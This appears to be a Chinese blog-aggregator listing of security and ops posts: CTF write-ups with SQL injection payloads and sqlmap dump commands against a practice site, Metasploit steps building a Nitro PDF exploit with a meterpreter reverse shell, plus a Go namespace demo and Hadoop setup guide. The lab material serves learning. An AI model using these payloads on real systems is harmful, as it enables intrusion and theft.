首页 文章 精选 留言 我的

精选列表

搜索[AB实验平台],共10006篇文章
优秀的个人博客,低调大师

因缺思汀的绕过——实验

因缺思汀的绕过分值:20 来源:pcat 难度:中 参与人数:9534人 Get Flag:3087人 答题人数:3370人 解题通过率:92% 访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码, 请求,响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。 web题主要考察SQL注入,XSS等相关知识。涉及方向较多。此题主要涉及源码审计,MySQL相关的知识。 flag格式 CTF{} 解题链接:http://ctf5.shiyanbar.com/web/pcat/index.php 解题思路:这一题考察的知识点比较多(可能是我不会的太多了QAQ) 首先,打开链接: 查看源代码就会得到: 看来出题人是希望我们能够看到源代码的呀 加上source.txt 就会得到: <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'."<br/>"; echo '<input name="uname" type="text"/>'."<br/>"; echo '<input name="pwd" type="text"/>'."<br/>"; echo '<input type="submit" />'."<br/>"; echo '</form>'."<br/>"; echo '<!--source: source.txt-->'."<br/>"; die; } function AttackFilter($StrKey,$StrValue,$ArrReq){ if (is_array($StrValue)){ $StrValue=implode($StrValue); } if (preg_match("/".$ArrReq."/is",$StrValue)==1){ print "水可载舟,亦可赛艇"; exit(); } } $filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)"; foreach($_POST as $key=>$value){ AttackFilter($key,$value,$filter); } $con = mysql_connect("XXXXXX","XXXXXX","XXXXXX"); if (!$con){ die('Could not connect: ' . mysql_error()); } $db="XXXXXX"; mysql_select_db($db, $con); $sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'"; $query = mysql_query($sql); if (mysql_num_rows($query) == 1) { $key = mysql_fetch_array($query); if($key['pwd'] == $_POST['pwd']) { print "CTF{XXXXXX}"; }else{ print "亦可赛艇"; } }else{ print "一颗赛艇"; } mysql_close($con); ?> 从源码可以看到,$filter进行的关键字符筛选仅仅针对$_POST['pwd'], 所以第二行一定不能带被其识别的关键字,如:select 提交就会出现: 我们接着往下看就会发现限制从数据库返回的数据必须是一行, 在满足filter条件的情况下可以使用 limit 的返回来确定数据库中总共有几行数据。 注意它的查询语句是 select * from interest where uname = ‘{$_POST[‘uname’]}’ 于是构造: 1' or 1 limit 1 offset 0# 1' or 1 limit 1 offset 1# 1' or 1 limit 1 offset 2# 发现2#时返回“一颗赛艇!” 其他都是“亦可赛艇!”———–说明数据库只有两条信息 接下来就是想办法绕过if判断,只要if的判断为真就可以通过,于是可以利用group by with rollup来进行绕过, group by with rollup会在统计后的产生一条null的信息,然后在pwd里面就可以不用写值了,if就为真 payload:1' or 1 group by pwd with rollup limit 1 offset 2# 就会得到答案: 参考资料: http://php.net/manual/zh/function.preg-match.php #函数preg_match http://blog.csdn.net/id19870510/article/details/6254358 #使用 GROUP BY WITH ROLLUP 改善统计性能 http://blog.csdn.net/yplee_8/article/details/52252549 #sql 中 limit 与 limit,offset连用的区别 http://www.w3school.com.cn/sql/sql_groupby.asp #SQL GROUP BY 语句 http://blog.csdn.net/jiangnan2014/article/details/17229713 #MySQL中with rollup的用法 http://php.freehostingguru.com/function.php-is_array.php #函数is_array http://www.w3school.com.cn/php/func_string_implode.asp #函数 implode 您可以考虑给博主来个小小的打赏以资鼓励,您的肯定将是我最大的动力。 作者: 落花四月 出处: https://www.cnblogs.com/lxz-1263030049/ 关于作者:潜心于网络安全学习。如有问题或建议,请多多赐教! 版权声明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接. 特此声明:所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误,共同进步。或者直接私信我 声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力!

优秀的个人博客,低调大师

——实验

今天有点时间就多写几篇解题思路吧, 希望能够帮助到那些需要帮助的人, 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 这一题做的时间比较久,但是收获颇多!!!! 永远爱你们的————新宝宝 这个看起来有点简单!分值:10 来源:西普学院 难度:易 参与人数:14133人 Get Flag:5392人 答题人数:6278人 解题通过率:86% 很明显。过年过节不送礼,送礼就送这个 格式: 解题链接:http://ctf5.shiyanbar.com/8/index.php?id=1 解题思路:看过视频之后,按照视频的教程解答可是怎么做就是不对,最后发现注入的网址不正确(QAQ),虽然浪费了很长的时间但是总的来说还是值得的; 首先:需要对这个网址进行手工检测是否存在sql注入(经典id=1'加入单引号提交,结果: 如果出现错误提示,则该网站可能就存在注入漏洞)使用sqlmap爆出当前数据库: 使用命令:python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db得到当前数据库:my_db 发现可能存在key于是输入命令: python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db—tables 得到: 再继续: python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey –columns就会得到: 然后把k0y里面值爆出来就好:需要输入: python sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump 最后得到答案:whatiMyD91dump 您可以考虑给博主来个小小的打赏以资鼓励,您的肯定将是我最大的动力。 作者: 落花四月 出处: https://www.cnblogs.com/lxz-1263030049/ 关于作者:潜心于网络安全学习。如有问题或建议,请多多赐教! 版权声明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接. 特此声明:所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误,共同进步。或者直接私信我 声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力!

优秀的个人博客,低调大师

kali下CVE_2017_7442利用实验

版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396580 参考:https://www.exploit-db.com/exploits/42418/https://www.youtube.com/watch?v=EhW9GhLF_Ww Nitro Pro PDF Reader 11.0.3.173 Javascript API远程执行代码 msfconsole search nitro_pdf use exploit/windows/fileformat/nitro_pdf_jspapi set payload windows/meterpreter/reverse_tcp set lhost 本机IP set lport 本机端口 set FILENAME test.pdf exploit 将生成的pdf文件cp出来,发给目标机。 前提是,目标机安装了https://www.gonitro.com 打开pdf以后,自动获得目标shell

优秀的个人博客,低调大师

《自己动手写docker》之namespace部门实验

动手写一遍,印象不一样! package main import ( "log" "os" "os/exec" "syscall" ) func main() { cmd := exec.Command("sh") cmd.SysProcAttr = &syscall.SysProcAttr{} cmd.SysProcAttr.Cloneflags = syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWPID | syscall.CLONE_NEWIPC | syscall.CLONE_NEWNET cmd.SysProcAttr.Credential = &syscall.Credential{Uid: uint32(1), Gid: uint32(1)} cmd.Stdin = os.Stdin cmd.Stdout = os.Stdout cmd.Stderr = os.Stderr if err := cmd.Run(); err != nil { log.Fatal(err) } os.Exit(-1) }

优秀的个人博客,低调大师

实验】Hadoop2.6.0的伪分布安装

hadoop-2.6.0.tar.gz: http://apache.fayea.com/hadoop/common/hadoop-2.6.0/hadoop-2.6.0.tar.gz jdk-7u79-linux-x64.gz: http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html 1 设置ip地址 点击(此处)折叠或打开 [root@test1 ~]# vi /etc/sysconfig/network-scripts/ifcfg-eth0 # Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) DEVICE=eth0 BOOTPROTO=none ONBOOT=yes HWADDR=00:0c:29:51:cc:37 TYPE=Ethernet NETMASK=255.255.255.0 IPADDR=192.168.23.131 GATEWAY=192.168.23.1 USERCTL=no IPV6INIT=no PEERDNS=yes 执行命令 service network restart 验证: ifconfig 2 关闭防火墙 执行命令 service iptables stop 验证: service iptables status 3 关闭防火墙的自动运行 执行命令 chkconfig iptables off 验证: chkconfig --list | grep iptables 4 设置主机名 执行命令 (1)hostname hadoop1 (2)vi /etc/sysconfig/network NETWORKING=yes NETWORKING_IPV6=yes HOSTNAME=hadoop1 5 ip与hostname绑定 执行命令 (1)vi /etc/hosts 192.168.23.131 hadoop1.localdomain hadoop1 验证: ping hadoop1 6 设置ssh免密码登陆 执行命令 (1)ssh-keygen -t rsa (2)cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys 验证: [root@test1 ~]# ssh hadoop1 The authenticity of host 'hadoop1 (192.168.23.131)' can't be established. RSA key fingerprint is e9:9f:f2:ea:f2:aa:47:58:5f:12:ea:3c:50:3f:0d:1b. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'hadoop1,192.168.23.131' (RSA) to the list of known hosts. Last login: Thu Feb 11 20:54:11 2016 from 192.168.23.1 [root@hadoop1 ~]# ssh hadoop1 Last login: Thu Feb 11 20:57:56 2016 from hadoop1.localdomain 7 安装jdk http://my.oschina.net/gaowm/blog/275184 (1)执行命令 点击(此处)折叠或打开 [root@hadoop1 java]# cd /usr/share/java [root@hadoop1 java]# cd [root@hadoop1 ~]# cd /usr/share/java [root@hadoop1 java]# cp /tmp/jdk-7u79-linux-x64.gz ./ [root@hadoop1 java]# tar -xzvf jdk-7u79-linux-x64.gz (2)vi /etc/profile 增加内容如下: export JAVA_HOME=/usr/share/java/jdk1.7.0_79 export PATH=.:$JAVA_HOME/bin:$PATH (3)source /etc/profile 验证: java -version 8 安装hadoop (1)执行命令 点击(此处)折叠或打开 [root@hadoop1 ~]# cd /usr/local/ [root@hadoop1 local]# cp /tmp/hadoop-2.6.0.tar.gz ./ [root@hadoop1 local]# tar -zxvf hadoop-2.6.0.tar.gz [root@hadoop1 local]# mv hadoop-2.6.0 hadoop (2)vi /etc/profile 增加内容如下: export JAVA_HOME=/usr/share/java/jdk1.7.0_79 export HADOOP_HOME=/usr/local/hadoop export PATH=.:$HADOOP_HOME/bin:$JAVA_HOME/bin:$PATH (3)source /etc/profile (4)修改/usr/local/hadoop/etc/hadoop目录下的配置文件hadoop-env.sh、core-site.xml、hdfs-site.xml、mapred-site.xml 点击(此处)折叠或打开 [root@hadoop1 hadoop]# vi hadoop-env.sh export JAVA_HOME=/usr/share/java/jdk1.7.0_79 [root@hadoop1 hadoop]# vi core-site.xml <configuration> <property> <name>fs.default.name</name> <value>hdfs://hadoop1:9000</value> </property> <property> <name>hadoop.tmp.dir</name> <value>/usr/local/hadoop/tmp</value> </property> </configuration> [root@hadoop1 hadoop]# vi hdfs-site.xml <configuration> <property> <name>dfs.replication</name> <value>1</value> </property> <property> <name>dfs.permissions</name> <value>false</value> </property> </configuration> ~ [root@hadoop1 hadoop]# cp mapred-site.xml.template mapred-site.xml [root@hadoop1 hadoop]# vi mapred-site.xml <configuration> <property> <name>mapred.job.tracker</name> <value>hadoop1:9001</value> </property> </configuration> (5)hadoop namenode -format (6)start-all.sh 点击(此处)折叠或打开 [root@hadoop1 hadoop]# cd sbin [root@hadoop1 sbin]# start-all.sh This script is Deprecated. Instead use start-dfs.sh and start-yarn.sh 16/02/11 21:40:54 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable Starting namenodes on [hadoop1] hadoop1: starting namenode, logging to /usr/local/hadoop/logs/hadoop-root-namenode-hadoop1.out The authenticity of host 'localhost (127.0.0.1)' can't be established. RSA key fingerprint is e9:9f:f2:ea:f2:aa:47:58:5f:12:ea:3c:50:3f:0d:1b. Are you sure you want to continue connecting (yes/no)? yes localhost: Warning: Permanently added 'localhost' (RSA) to the list of known hosts. localhost: starting datanode, logging to /usr/local/hadoop/logs/hadoop-root-datanode-hadoop1.out Starting secondary namenodes [0.0.0.0] The authenticity of host '0.0.0.0 (0.0.0.0)' can't be established. RSA key fingerprint is e9:9f:f2:ea:f2:aa:47:58:5f:12:ea:3c:50:3f:0d:1b. Are you sure you want to continue connecting (yes/no)? yes 0.0.0.0: Warning: Permanently added '0.0.0.0' (RSA) to the list of known hosts. 0.0.0.0: starting secondarynamenode, logging to /usr/local/hadoop/logs/hadoop-root-secondarynamenode-hadoop1.out 16/02/11 21:41:27 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable starting yarn daemons starting resourcemanager, logging to /usr/local/hadoop/logs/yarn-root-resourcemanager-hadoop1.out localhost: starting nodemanager, logging to /usr/local/hadoop/logs/yarn-root-nodemanager-hadoop1.out [root@hadoop1 sbin]# jps 7192 SecondaryNameNode 7432 NodeManager 7468 Jps 6913 NameNode 7333 ResourceManager 7036 DataNode 验证: (1)执行命令jps 如果看到5个新的java进程,分别是NameNode、SecondaryNameNode、DataNode、ResourceManager、NodeManager (2)在浏览器查看 hadoop web控制台页面的端口整理: 50070:hdfs文件管理 http://192.168.23.131:50070 8088:ResourceManager http://192.168.23.131:8088 8042:NodeManager http://192.168.23.131:8042 9 启动时没有NameNode的可能原因: (1)没有格式化 (2)环境变量设置错误 (3)ip与hostname绑定失败 参考: http://stark-summer.iteye.com/blog/2184123 http://www.aboutyun.com/thread-7513-1-1.html

资源下载

更多资源
Mario

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长,特征是大鼻子、头戴帽子、身穿背带裤,还留着胡子。与他的双胞胎兄弟路易基一起,长年担任任天堂的招牌角色。

Spring

Spring

Spring框架(Spring Framework)是由Rod Johnson于2002年提出的开源Java企业级应用框架,旨在通过使用JavaBean替代传统EJB实现方式降低企业级编程开发的复杂性。该框架基于简单性、可测试性和松耦合性设计理念,提供核心容器、应用上下文、数据访问集成等模块,支持整合Hibernate、Struts等第三方框架,其适用范围不仅限于服务器端开发,绝大多数Java应用均可从中受益。

Sublime Text

Sublime Text

Sublime Text具有漂亮的用户界面和强大的功能,例如代码缩略图,Python的插件,代码段等。还可自定义键绑定,菜单和工具栏。Sublime Text 的主要功能包括:拼写检查,书签,完整的 Python API , Goto 功能,即时项目切换,多选择,多窗口等等。Sublime Text 是一个跨平台的编辑器,同时支持Windows、Linux、Mac OS X等操作系统。

WebStorm

WebStorm

WebStorm 是jetbrains公司旗下一款JavaScript 开发工具。目前已经被广大中国JS开发者誉为“Web前端开发神器”、“最强大的HTML5编辑器”、“最智能的JavaScript IDE”等。与IntelliJ IDEA同源,继承了IntelliJ IDEA强大的JS部分的功能。

用户登录
用户注册